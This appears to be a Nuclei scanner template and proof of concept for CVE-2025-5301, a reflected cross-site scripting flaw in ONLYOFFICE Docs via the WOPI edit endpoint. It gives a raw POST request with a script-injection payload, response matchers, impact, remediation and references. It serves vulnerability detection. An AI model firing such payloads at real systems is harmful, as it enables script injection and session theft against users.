ONLYOFFICE Docs (DocumentServer) <= 8.3.1 contains a reflected XSS caused by improper sanitization of crafted HTTP POST requests via the WOPI protocol, letting attackers inject malicious scripts reflected in HTML response, exploit requires crafted POST requests.
PoC代码[已公开]
id: CVE-2025-5301
info:
name: ONLYOFFICE Docs (DocumentServer) - Reflected Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
ONLYOFFICE Docs (DocumentServer) <= 8.3.1 contains a reflected XSS caused by improper sanitization of crafted HTTP POST requests via the WOPI protocol, letting attackers inject malicious scripts reflected in HTML response, exploit requires crafted POST requests.
impact: |
Attackers can execute malicious scripts in users' browsers, potentially stealing session data or performing actions on behalf of users.
remediation: |
Update to a version later than 8.3.1.
reference:
- https://github.com/ONLYOFFICE/
- https://seclists.org/fulldisclosure/2025/Jun/18
- https://nvd.nist.gov/vuln/detail/CVE-2025-5301
- https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#832
- https://r.sec-consult.com/onlyoffice
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-5301
cwe-id: CWE-79
epss-score: 0.06718
epss-percentile: 0.90907
metadata:
verified: false
tags: cve,cve2025,onlyoffice,xss,vuln,seclists
http:
- raw:
- |
POST /hosting/wopi/word/edit?dchat=asdasd</script><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "{\"dchat\":", "</script><script>alert(document.domain)</script>")'
condition: and
# digest: 490a0046304402204ca9e5b6f8875469d829abb63a9a0fe8751b04a0d3388ee1ee0101106136a0b802206ee0aa0f7f79d27b5d57cb7ea0e2e522dca56af025d5bd3cb4bbe986da12f600:922c64590222798bb761d5b6d8e72950